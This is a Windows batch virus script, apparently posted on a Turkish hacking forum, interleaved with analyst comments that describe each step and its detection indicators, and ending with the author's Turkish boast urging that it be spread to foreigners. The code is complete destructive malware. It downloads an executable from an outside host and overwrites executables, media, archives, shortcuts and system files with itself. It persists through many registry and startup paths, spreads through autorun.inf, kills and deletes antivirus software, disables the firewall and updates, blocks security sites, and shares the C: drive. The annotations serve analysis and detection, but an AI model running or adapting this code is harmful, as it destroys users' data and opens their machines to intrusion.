start http://s3.dosya.tc/en2.php?a=server14/ava7sk/Server.exe&b=c21e284483728676b18c62a77b84ffe2
echo result=Msgbox("THT %%%%%%%%%%%%%%%%%%E%%%%%%%%%%%%%%%%%%%%%%R%%%%%%%%%%%%E%%%%%%%%%%%%%%%%N%%%%%%%%%%%%%%%%%%%%%E%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%S%%%%%%%%%%%%%%%%%%%%%%%%%T%%%%%%%%%%%%%%E%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%R%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%",vbOKCancel+vbInformation, "Buna İSİM KOYACAKSANIZ!")>>mssg.vbs
:DEVAM
start mssg.vbs
rem ---------------------------------
rem Infect all .exe files
rem Analysis: sets the .exe association to the batfile type, so opening an
rem executable is handed to the batch interpreter instead of the normal loader.
rem Indicator: .exe no longer mapped to exefile.
assoc .exe=batfile
rem Analysis: writes a recursive list of every .exe on the system drive to
rem InfList_exe.txt in the current directory. The list file is a host artifact.
DIR /S/B %SystemDrive%\*.exe >> InfList_exe.txt
rem Analysis: copies this script over each listed file, answering Y to the
rem overwrite prompt. The originals are overwritten, so recovery means restoring
rem from backup. Indicator: .exe files whose content is batch text.
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_exe.txt) do copy %0 "%%j:%%k"
rem ---------------------------------
rem ---------------------------------
rem Infect AUTOEXEC.BAT
rem Analysis: persistence attempt. Appends a start line for this script to
rem AUTOEXEC.BAT on the system drive; if that file exists, also drops a copy as
rem toaDyxpB2.bat in the Windows directory and appends a start line for it.
rem Indicators: toaDyxpB2.bat under the system root, start lines naming a .bat
rem in AUTOEXEC.BAT.
echo start "" %0>>%SystemDrive%\AUTOEXEC.BAT
If Exist "%systemdrive%\AUTOEXEC.BAT" (
copy %0 "%systemroot%\toaDyxpB2.bat"
echo start "" "%systemroot%\toaDyxpB2.bat" >> %systemdrive%\AUTOEXEC.BAT
)
rem ---------------------------------
rem ---------------------------------
rem Infect the Run keys
rem Analysis: persistence through the machine-wide Run key. Two values are
rem written with this script as their data: one named rundll32_ plus a random
rem number plus _toolbar, and one with the fixed name rundll32_awspeGfa_w32.
rem Detection: Run values whose name imitates rundll32 but whose data is a
rem batch file path; reg.exe writing to the Run key from a script parent.
set valinf="rundll32_%random%_toolbar"
set reginf="hklm\Software\Microsoft\Windows\CurrentVersion\Run"
reg add %reginf% /v %valinf% /t "REG_SZ" /d %0 /f > nul
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_awspeGfa_w32" /t "REG_SZ" /d %0 /f > nul
rem ---------------------------------
rem ---------------------------------
rem Infect all .mp3 files
rem Analysis: this section and the two after it repeat one pattern for .mp3,
rem .rar and .zip: remap the extension to batfile, list matching files on the
rem system drive into an InfList text file in the current directory, then copy
rem this script over every listed file. User data is overwritten, so triage
rem should treat the affected files as lost and plan restoration from backup.
assoc .mp3=batfile
DIR /S/B %SystemDrive%\*.mp3 >> InfList_mp3.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_mp3.txt) do copy %0 "%%j:%%k"
rem ---------------------------------
rem ---------------------------------
rem Infect all .rar files
assoc .rar=batfile
DIR /S/B %SystemDrive%\*.rar >> InfList_rar.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_rar.txt) do copy %0 "%%j:%%k"
rem ---------------------------------
rem ---------------------------------
rem Infect all .zip files
assoc .zip=batfile
DIR /S/B %SystemDrive%\*.zip >> InfList_zip.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_zip.txt) do copy %0 "%%j:%%k"
rem ---------------------------------
rem Analysis: drops a copy of this script as ls.bat in system32.
copy %0 %windir%\system32\ls.bat
rem Analysis: hosts file tampering. The first echo truncates the existing hosts
rem file and the rest append, mapping search, portal and antivirus vendor
rem domains to loopback so those sites stop resolving on the host.
rem Detection: integrity monitoring on the hosts file and alerting on
rem security-vendor names mapped to 127.0.0.1.
rem Recovery: restore the hosts file from a known-good copy.
echo 127.0.0.1 www.google.com > %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.google.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.symantec.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.free-av.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.free-av.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.antivir.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.antivir.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.kaspersky.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.kaspersky.de >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.sophos.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
echo 127.0.0.1 www.lycos.de >> %windir%\system32\drivers\etc\hosts
rem Analysis: writes a page named NeCros.html into the Windows directory. Its
rem title names the builder kit and its body is a Turkish notice telling the
rem user the computer is infected.
echo "<html>" > %windir%\NeCros.html
echo "<head>" >> %windir%\NeCros.html
echo "<title>This Virus was builded with BVG NeCroPhilie</title>" >> %windir%\NeCros.html
echo "</head>" >> %windir%\NeCros.html
echo "<body bgcolor="#64FB12">" >> %windir%\NeCros.html
echo "<p align=center><b><font face=Arial size=7 color="#000000">Bilgisayarin enfeksiyon kapti. Bu Bilgisayar virusler tarafindan el konuldu. </font></b></p>" >> %windir%\NeCros.html
echo "</body>" >> %windir%\NeCros.html
echo "</html>" >> %windir%\NeCros.html
rem Analysis: points the current user's Internet Explorer start page at that
rem local file. Indicator: the Start Page value holding a path under the Windows
rem directory instead of a URL.
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "%windir%\NeCros.html" /f > nul
rem Analysis: per-user Startup folder persistence. Indicator: a batch file
rem appearing in the Startup folder.
copy %0 "%userprofile%\Start Menu\Programs\Startup"
rem ---------------------------------
rem Infect all .mpeg files
rem Analysis: the same remap, list and overwrite pattern as the earlier
rem extension sections, here for .mpeg, .mp4, .jpg and .lnk. Remapping .lnk
rem changes how shortcuts are opened. Indicators: the InfList text files in the
rem working directory and these extensions associated with batfile.
assoc .mpeg=batfile
DIR /S/B %SystemDrive%\*.mpeg >> InfList_mpeg.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_mpeg.txt) do copy %0 "%%j:%%k"
rem ---------------------------------
rem ---------------------------------
rem Infect all .mp4 files
assoc .mp4=batfile
DIR /S/B %SystemDrive%\*.mp4 >> InfList_mp4.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_mp4.txt) do copy %0 "%%j:%%k"
rem ---------------------------------
rem ---------------------------------
rem Infect all .jpg files
assoc .jpg=batfile
DIR /S/B %SystemDrive%\*.jpg >> InfList_jpg.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_jpg.txt) do copy %0 "%%j:%%k"
rem ---------------------------------
rem ---------------------------------
rem Infect .lnk shortcuts
assoc .lnk=batfile
DIR /S/B %SystemDrive%\*.lnk >> InfList_lnk.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_lnk.txt) do copy %0 "%%j:%%k"
rem ---------------------------------
rem ---------------------------------
rem Infect all drives
rem Analysis: drive-root propagation. For each letter A to Z the loop copies
rem this script to the drive root and writes an autorun.inf whose open entry
rem names it, with an action label worded like the ordinary open-folder prompt.
rem Mitigation: keep AutoRun disabled by policy for all drive types.
rem Detection: autorun.inf created together with a batch file at a drive root.
for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do (
copy /Y %0 %%E:\
echo [AutoRun] > %%E:\autorun.inf
echo open="%%E:\%0" >> %%E:\autorun.inf
echo action=Open folder to see files... >> %%E:\autorun.inf)
rem ---------------------------------
rem ---------------------------------
rem Infect all folders
rem Analysis: lists everything under the Windows directory into a file named
rem PathHost, copies this script over each listed path and over every file in
rem the current directory, then deletes the list. This is a destructive
rem overwrite of system files, so remediation is a rebuild or restore from
rem backup, not in-place cleaning.
Dir %SystemRoot% /s /b > PathHost
For /f %%a In (PathHost) Do Copy /y %0 %%a > Nul
For %%a in (*.*) do copy %0 %%a > nul
Del /f /s /q PathHost > Nul
rem ---------------------------------
rem Analysis: security-service tampering. Requests a stop of the Security
rem Center and SharedAccess services, then builds a registry script named
rem kill.reg under the temp path that sets the Start value to 4, the disabled
rem start type, under the service keys written for SharedAccess, wuauserv and
rem wscsvc. The script is imported silently with regedit and then deleted.
rem Detection: regedit run with the silent switch from a script parent, a .reg
rem file created and removed in the temp path, Start value changes on firewall,
rem update or Security Center services.
net stop "Security Center"
net stop SharedAccess
> "%Temp%.\kill.reg" ECHO A R E S
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SharedAccess]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\wuauserv]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\w scsvc]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.\kill.reg"
DEL "%Temp%.\kill.reg"
rem Analysis: removes the script file at the path it was launched from.
DEL %0
rem ---------------------------------
rem Anti-virus killer v1
rem Analysis: defense-impairment section. It asks for the Security Center
rem service to stop and switches the Windows Firewall off through netsh. The
rem tskill and del lines that follow end processes by name pattern in all
rem sessions and delete files under antivirus install directories. Several
rem patterns are broad, for example upd*, tmp*, scan* and msiexec, so unrelated
rem processes match too.
rem Detection: a burst of tskill or net stop commands from one script parent,
rem a firewall operational-mode change, security product processes exiting
rem together.
net stop Security Center
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A ekrn*
tskill /A egui*
tskill /A anti
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guar*
tskill /A gcasDt*
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
cls
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
tskill /A sweep*
tskill /A scan*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\ESET\ESET Smart Security\*.exe
del /Q /F C:\Program Files\ESET\ESET Smart Security\*.dll
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem ---------------------------------
rem Analysis: ends processes matching guard* and norton* in all sessions.
tskill /A guard*
tskill /A norton*
rem Analysis: further persistence. Copies this script into the Windows
rem directory under its own name and registers that copy under the machine-wide
rem RunServices key as the value Pwner.
rem Indicator: a RunServices value named Pwner.
copy %0 %windir%\%0
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices /v Pwner /t REG_SZ /d %windir%\%0 /f >nul
rem Analysis: copies this script into system32 and appends a windows section
rem with load and run entries naming it to win.ini.
rem Indicator: load= or run= lines in win.ini that name a batch file.
copy %0 %systemroot%\system32\%0
echo [windows] >> %systemroot%\win.ini
echo load=%systemroot%\system32\%0 >> %systemroot%\win.ini
echo run=%systemroot%\system32\%0 >> %systemroot%\win.ini
rem Analysis: the loopback ping is used as a delay before the next step.
PING 127.0.0.1 -n 5
Rem -- Set to a wait of about 5 seconds, you can change it. You can delete this note. --
rem Analysis: starts server.exe from a relative downloads path. Presumably this
rem is the payload the accompanying post calls a keylogger - confirm against
rem the sample. Detection: cmd.exe starting an executable from a user download
rem location right after registry and hosts file changes.
start downloads/server.exe
rem Analysis: all-users Startup persistence. Copies this script into the
rem Startup folder under English and German folder names, using the fixed names
rem winlog.bat, crauto.bat, autoexe.bat and activedesktop.bat plus names made of
rem a random number. Detection: new batch files in any Startup folder,
rem especially several created within the same second.
copy %0 "C:\********s and Settings\All Users\Start Menu\Programs\Startup\winlog.bat" > nul
copy %0 "C:\********s and Settings\All Users\Start Menu\Programs\Startup\%random%.bat" > nul
copy %0 "C:\********s and Settings\All Users\Start Menu\Programs\Startup\%random%.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Autostart\winlog.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Autostart\%random%.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Autostart\%random%.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Autostart\%random%.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Autostart\%random%.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Autostart\crauto.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Autostart\autoexe.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Autostart\activedesktop.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Autostart\%random%.bat" > nul
rem Analysis: repeats the AUTOEXEC.BAT and machine-wide Run key persistence,
rem this time with a copy named toaDyxpB.bat in the Windows directory and the
rem Run value rundll32_awspeGfa_w32.
If Exist "%systemdrive%\AUTOEXEC.BAT" (
copy %0 "%systemroot%\toaDyxpB.bat"
echo start "" "%systemroot%\toaDyxpB.bat" >> %systemdrive%\AUTOEXEC.BAT
)
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_awspeGfa_w32" /t "REG_SZ" /d %0 /f > nul
rem Analysis: takes the text before the first backslash of PATH as Root and
rem runs it as a command, which switches to that drive.
for /f "tokens=1-1 delims=\" %%a in ("%PATH%") do (Set Root=%%a)
%Root%
rem Analysis: when TheBat.bat is absent from the Windows directory, control
rem jumps to SavedIt, which adds a machine-wide Run value named $peer pointing
rem at it and copies TheBat.bat from the current directory.
rem Indicators: TheBat.bat under the system root and a Run value named $peer.
IF NOT EXIST "%systemroot%\TheBat.bat" GOTO SavedIt
GOTO END
:SavedIt
REG ADD "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run" /f /v "$peer" /t "REG_SZ" /d "%systemroot%\TheBat.bat"
copy "TheBat.bat" %systemroot%
rem Analysis: network exposure. Issues net share for the administrative share
rem names ADMIN$, C$ and IPC$ and shares the whole C: drive under the name c.
rem Detection: audit share creation and alert on any share whose path is a
rem drive root. Recovery: remove the c share and review share permissions.
net share ADMIN$
net share C$
net share IPC$
net share c=c:
rem Analysis: one more copy into the All Users Startup folder, reached through
rem the parent of the user profile, followed by a loopback ping.
copy %0 "%userprofile%\..\All Users\Start Menu\Programs\Startup"
PING 127.0.0.1 -n 5
Rem
Uyarayım bu virüs yakında basın yoluyla ben tarafından yabancı sitelere duyrulup yayılacaktır(en az 6 ay) bilgisayarın her uzantısına karışıyor ve keyloggerimi indirip açıyor bununla kalmayıp 127.0.0.1 engelliyor ve nekadar antivirüs varsa (bilinen ki zaten bilinenler güçlü koruyanlardır) blokluyor kendisi zaten Cryptlenmiş yani son zamanlarda THT ERENESTER adlı bir virüs görürseniz tıklamayın ayriyetten bu virüsü nekadar yabancıya paylaşırsanız iyidir ayrıca keyloggerimi THT S.Modlarına paylaşıp gerekirse iyice yayıp namımızı yaymayı düşünüyorum
Türklere Yaymaya çalışmayın onlara uygulanmayacaktır
Notlarım:
1-Tüm driverlere bulaşır
2-lnk (kısayollara bulaşır)
3-Exe ,inf bulaşır
4-tüm "*.mp*"uzantıları ve tüm video uzantılarına bulaşır
5-Ağa kendini tamamen yayar ve kitler
6-Başlangıçta çalışarak 2 defa(biri normal biride keylog serveri üstünden) Virüsün adını söyler
7-Silinmesi çok zordur Sistem dosyası haline girer ve Systemin .inin uzantısına karışır
8-üvenlik duvarını yıkar
9- üstteki linkim ana virüstür kaynağını isteyen bana ulaşsın
10- Program güncellendi Ve dewam edecektir
11-Exe yapıldı 3 defa crypt çekildi backdoor algılıyor ama pek sorun olmaz sonuçta MusAllAt.exe virüsünden daha iyi yayılmakta dahada crypt çekilecektirÜstte Batcirüs oluşturucu 1.7.00 ilr haxırlsnmıştır diyor o progrsm THT den çıkma zaten ana virüs cryptli oldugundan birtek tht görebiliyor oda bizim nazar PONÇİKİMİZ olsun...





